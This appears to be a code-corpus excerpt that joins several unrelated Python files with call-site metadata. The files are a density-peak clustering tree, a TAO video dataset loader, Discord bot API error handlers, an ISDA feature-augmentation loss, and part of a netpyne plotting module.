def removeChild(self,child):
self.children.remove(child)
def resetChildren(self):
self.children = []
def setParentId(self,parent_id):
self.parent_id = parent_id
def setOffspringNum(self,num):
self.offspring_num = num
def setLvl(self,lvl):
self.lvl = lvl
def getAttr(self):
return self.attr_list
def getNodeId(self):
return self.node_id
def getParentId(self):
return self.parent_id
def getDistToParent(self):
return self.dist_to_parent
def getDensity(self):
return self.density
def getGamma(self):
return self.gamma
def getChildren(self):
return self.children
def hasChildren(self,child_id):
if child_id in self.children:
return True
else:
return False
def getOffspringNum(self):
return self.offspring_num
def getLvl(self):
return self.lvl
class DPTree():
def __init__(self):
self.node_count = 0
self.node_dir = {}
self.root_node = None
self.node_offspring = {}
self.sorted_gamma_index = None
pass
def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma):
#* 根据 gamma 顺序新建节点
node_dir = {}
node_created = np.zeros(len(sorted_gamma_index))
self.sorted_gamma_index = sorted_gamma_index
for i in range(len(sorted_gamma_index)):
node_id = sorted_gamma_index[i]
parent_id = closest_node_id[node_id] #* closest_node_id是根据排序后的gamma获得的
attr_list = X[node_id]
dist_to_parent = closest_dis_denser[node_id]
density = local_density[node_id]
if(node_created[node_id]==0):
node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma[node_id],children=[])
node_created[node_id] = 1
node_dir[node_id] = node
node_dir[node_id].setParentId(parent_id)
if(node_created[parent_id]==0):
parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[])
node_created[parent_id] = 1
node_dir[parent_id] = parent_node
parent_node = node_dir[parent_id]
cur_node = node_dir[node_id]
if(node_id != parent_id):#* 非根节点
parent_node.addChild(node_id)
# parent_lvl = parent_node.getLvl()
# cur_node.setLvl(parent_lvl+1)
else:
if(parent_node.getLvl()==None):
parent_node.setLvl(0)
#* 设置节点层次信息
# for i in tree.node_dir:
# pass
self.root_node = node_dir[sorted_gamma_index[0]]
self.node_dir = node_dir
self.node_count = len(sorted_gamma_index)
pass
def printTree2(self,parent_id,spaceStr=''):
for node_id in self.node_dir:
if(node_id==self.root_node.node_id):
continue
node = self.node_dir[node_id]
if(node.parent_id==parent_id):
print(spaceStr, node.node_id, sep = '')
self.printTree2(node.node_id,spaceStr+' ')
pass
def calcu_subtree_offspring_num(self,node_id):
node = self.node_dir[node_id]
cur_offsprings = node.getOffspringNum()
if(cur_offsprings!=None):
return cur_offsprings
child_num = len(node.children)
if(child_num==0):
return 0
for i in node.children:
cur_offsprings = self.calcu_subtree_offspring_num(i)
child_num+=cur_offsprings
node.setOffspringNum(child_num)
return child_num
def get_subtree_offspring_id(self,node_id,other_idlist):
'''
获取所有子孙的node_id
考虑:是否需要存储在node属性中。
'''
def fn_get_subtree_offspring_id(node_id,offspring_idlist):
if(node_id in self.node_offspring.keys()):
return self.node_offspring[node_id]
else:
node = self.node_dir[node_id]
children = node.getChildren()
child_num = len(children)
if(child_num==0):
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist= list(offspring_idlist) + children
for i in children:
child_offspring_idlist = fn_get_subtree_offspring_id(i,[])
self.node_offspring[i] = child_offspring_idlist
offspring_idlist= list(offspring_idlist) + child_offspring_idlist
pass
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist = fn_get_subtree_offspring_id(node_id,[])
return np.array(list(offspring_idlist) + other_idlist)
def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser):
p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id])
p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum
entropy = -1*np.sum(p*np.log2(p))
#* 只有一个点的情况返回 0
if(entropy==0):
return 0
return entropy/(-1*np.log2(1/(len(offspring_id))))
def remove_subtree(self,child_id):
'''
删除 node_id 节点的子树:child_id, 被删除的子树形成新的树并返回
1. 更新 self.node_dir, self.node_count
2. 更新 node_id 节点的 children[], 以及所有父级offspring_num
3. 生成新树
'''
# print("删除子节点:",child_id)
offspring_id = self.get_subtree_offspring_id(child_id,[child_id])
offspring_len = len(offspring_id)
node_id = self.node_dir[child_id].parent_id
node = self.node_dir[node_id]
node.removeChild(child_id)
self.node_count = self.node_count-offspring_len
#* 删除存储的子孙节点
if(node_id in self.node_offspring.keys()):
for node_to_delete in offspring_id:
self.node_offspring[node_id].remove(node_to_delete)
print("删除子孙节点:",node_to_delete)
pass
pass
# cur_id = child_id
# parent_id = node_id
# #* 设置父级 offspring_num:
# while(cur_id!=parent_id):
# parent_node = self.node_dir[parent_id]
# if(parent_node.getOffspringNum()!=None):
# parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len)
# cur_id = parent_id
# parent_id = parent_node.parent_id
# pass
#* 更新 self.node_dir, 生成新树:
new_tree = DPTree()
for i in offspring_id:
removed_node = self.node_dir.pop(i)
new_tree.node_dir[i] = removed_node
pass
new_tree.node_count = offspring_len
new_tree.root_node = new_tree.node_dir[child_id]
new_tree.root_node.setParentId(child_id)
return new_tree
def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps):
'''
计算两个子树间的连通距离
return:
1. 最短距离
2. 小于距离阈值的点集
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = float('inf')
for i in offspring_two:
tmp_dist = np.min(dist_mat[i][offspring_one])
if(tmp_dist<dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix):
'''
计算两个子树间的邻近点
return:
邻近的点对
所有邻近点
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
pairs_nodes = []
for i in offspring_two:
connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one)
if len(connected_nodes_index)>0:
for j in connected_nodes_index:
pairs_nodes.append([i,j])
pass
pass
if(len(pairs_nodes)==0):
return pairs_nodes,connected_nodes
return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten())
def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps):
'''
计算两个子树间的连通距离
return:
1. 最大相似距离
2. 大于相似距离阈值的点集
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = -1
for i in offspring_two:
tmp_dist = np.max(dist_mat[i][offspring_one])
if(tmp_dist>=dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_depth(self,node_id, depth):
node = self.node_dir[node_id]
parent_id = node.parent_id
if(node_id==parent_id):
return depth
else:
return self.calcu_depth(parent_id,depth+1)
| [] |
Nik-V9/AirObject | datasets/tao/tao.py | 5937e64531f08449e81d2c90e3c6643727efbaf0 | from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output) | [((3, 0, 3, 20), 'sys.path.append', 'sys.path.append', ({(3, 16, 3, 19): '"""."""'}, {}), "('.')", False, 'import sys\n'), ((77, 23, 77, 48), 'os.path.normpath', 'os.path.normpath', ({(77, 40, 77, 47): 'basedir'}, {}), '(basedir)', False, 'import os\n'), ((141, 17, 141, 58), 'os.path.join', 'os.path.join', ({(141, 30, 141, 42): 'self.basedir', (141, 44, 141, 57): '"""JPEGImages/"""'}, {}), "(self.basedir, 'JPEGImages/')", False, 'import os\n'), ((142, 20, 142, 57), 'os.path.join', 'os.path.join', ({(142, 33, 142, 45): 'self.basedir', (142, 47, 142, 56): '"""points/"""'}, {}), "(self.basedir, 'points/')", False, 'import os\n'), ((143, 17, 143, 59), 'os.path.join', 'os.path.join', ({(143, 30, 143, 42): 'self.basedir', (143, 44, 143, 58): '"""Annotations/"""'}, {}), "(self.basedir, 'Annotations/')", False, 'import os\n'), ((78, 15, 78, 42), 'os.path.isdir', 'os.path.isdir', ({(78, 29, 78, 41): 'self.basedir'}, {}), '(self.basedir)', False, 'import os\n'), ((125, 15, 125, 37), 'os.path.isfile', 'os.path.isfile', ({(125, 30, 125, 36): 'videos'}, {}), '(videos)', False, 'import os\n'), ((139, 14, 139, 36), 'numpy.arange', 'np.arange', ({(139, 24, 139, 35): 'self.seqlen'}, {}), '(self.seqlen)', True, 'import numpy as np\n'), ((205, 24, 205, 53), 'cv2.imread', 'cv2.imread', ({(205, 35, 205, 52): 'color_seq_path[i]'}, {}), '(color_seq_path[i])', False, 'import cv2\n'), ((206, 24, 206, 62), 'cv2.cvtColor', 'cv2.cvtColor', ({(206, 37, 206, 42): 'image', (206, 44, 206, 61): 'cv2.COLOR_BGR2RGB'}, {}), '(image, cv2.COLOR_BGR2RGB)', False, 'import cv2\n'), ((215, 26, 215, 49), 'numpy.unique', 'np.unique', ({(215, 36, 215, 48): 'instance_img'}, {}), '(instance_img)', True, 'import numpy as np\n'), ((147, 37, 147, 64), 'os.path.join', 'os.path.join', ({(147, 50, 147, 56): 'rgbdir', (147, 58, 147, 63): 'video'}, {}), '(rgbdir, video)', False, 'import os\n'), ((214, 40, 214, 67), 'PIL.Image.open', 'Image.open', ({(214, 51, 214, 66): 'seg_seq_path[i]'}, {}), '(seg_seq_path[i])', True, 'import PIL.Image as Image\n'), ((229, 29, 229, 44), 'pickle.load', 'pickle.load', ({(229, 41, 229, 43): 'fp'}, {}), '(fp)', False, 'import pickle\n'), ((234, 24, 234, 49), 'torch.stack', 'torch.stack', ({(234, 36, 234, 45): 'color_seq', (234, 47, 234, 48): '0'}, {}), '(color_seq, 0)', False, 'import torch\n'), ((149, 44, 149, 74), 'os.path.join', 'os.path.join', ({(149, 57, 149, 66): 'pointsdir', (149, 68, 149, 73): 'video'}, {}), '(pointsdir, video)', False, 'import os\n'), ((151, 41, 151, 68), 'os.path.join', 'os.path.join', ({(151, 54, 151, 60): 'segdir', (151, 62, 151, 67): 'video'}, {}), '(segdir, video)', False, 'import os\n'), ((208, 24, 208, 47), 'torch.from_numpy', 'torch.from_numpy', ({(208, 41, 208, 46): 'image'}, {}), '(image)', False, 'import torch\n'), ((146, 55, 146, 82), 'os.path.join', 'os.path.join', ({(146, 68, 146, 74): 'rgbdir', (146, 76, 146, 81): 'video'}, {}), '(rgbdir, video)', False, 'import os\n'), ((216, 35, 216, 56), 'numpy.isin', 'np.isin', ({(216, 43, 216, 50): 'obj_ids', (216, 52, 216, 55): '[0]'}, {}), '(obj_ids, [0])', True, 'import numpy as np\n'), ((222, 31, 222, 60), 'numpy.isin', 'np.isin', ({(222, 39, 222, 51): 'instance_img', (222, 53, 222, 59): 'obj_id'}, {}), '(instance_img, obj_id)', True, 'import numpy as np\n')] |
The-CJ/Phaazebot | Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py | 83a9563d210718071d4e2cdcca3b212c87abaf51 | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel does not exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel does not exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| [((45, 7, 45, 22), 'json.dumps', 'json.dumps', ({(45, 18, 45, 21): 'res'}, {}), '(res)', False, 'import json\n'), ((86, 7, 86, 22), 'json.dumps', 'json.dumps', ({(86, 18, 86, 21): 'res'}, {}), '(res)', False, 'import json\n')] |
RichardScottOZ/sota-data-augmentation-and-optimizers | augmentation/ISDA.py | 60128ca762ac2864a3b54c43c36d1d5aa2033e5a | import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
| [((9, 26, 9, 74), 'torch.zeros', 'torch.zeros', ({(9, 38, 9, 47): 'class_num', (9, 49, 9, 60): 'feature_num', (9, 62, 9, 73): 'feature_num'}, {}), '(class_num, feature_num, feature_num)', False, 'import torch\n'), ((10, 19, 10, 54), 'torch.zeros', 'torch.zeros', ({(10, 31, 10, 40): 'class_num', (10, 42, 10, 53): 'feature_num'}, {}), '(class_num, feature_num)', False, 'import torch\n'), ((11, 22, 11, 44), 'torch.zeros', 'torch.zeros', ({(11, 34, 11, 43): 'class_num'}, {}), '(class_num)', False, 'import torch\n'), ((23, 17, 23, 34), 'torch.zeros', 'torch.zeros', ({(23, 29, 23, 30): 'N', (23, 32, 23, 33): 'C'}, {}), '(N, C)', False, 'import torch\n'), ((80, 29, 80, 50), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', True, 'import torch.nn as nn\n'), ((105, 27, 106, 45), 'torch.bmm', 'torch.bmm', ({(105, 37, 105, 52): '(NxW_ij - NxW_kj)', (106, 37, 106, 44): 'CV_temp'}, {}), '(NxW_ij - NxW_kj, CV_temp)', False, 'import torch\n'), ((109, 28, 109, 40), 'torch.eye', 'torch.eye', ({(109, 38, 109, 39): 'C'}, {}), '(C)', False, 'import torch\n')] |
sanjayankur31/netpyne | netpyne/plotting/plotter.py | d8b7e94cabeb27e23e30853ff17ae86518b35ac2 | """
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
